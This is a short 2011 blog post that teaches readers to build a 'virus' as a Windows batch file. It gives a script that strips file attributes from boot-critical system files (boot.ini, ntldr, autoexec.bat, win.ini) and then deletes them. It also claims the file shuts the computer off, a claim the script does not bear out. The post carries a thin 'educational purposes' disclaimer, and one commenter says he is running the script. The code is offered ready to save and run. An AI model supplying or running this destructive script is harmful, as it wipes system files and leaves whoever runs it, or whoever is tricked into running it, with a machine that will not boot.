
Friday, March 25, 2011

Shutdown The Pc Forever !~

Heylo Guy'z I Will Teach You to create virus that will shutdown the computer forever. And this tutorial is only for educational purposes.
Please donot use it in your computer....
Open notepad and copy/paste this code:

: : : Code Given Below: : : :

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now Save This File as a " c2master.bat"

Please don't double click this file in your computer. 
This file shut down the computer. It shuts the computer off and deletes the files required to reboot and restart...! O.o

** If You Like My Post Then Take A Second To Say " Thank You " (x_X)

                                         Regards : c2 Aka Blackstroker :)


abhi.sanghani said...
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abhi.sanghani said...

cool dude , i am doing it right now............

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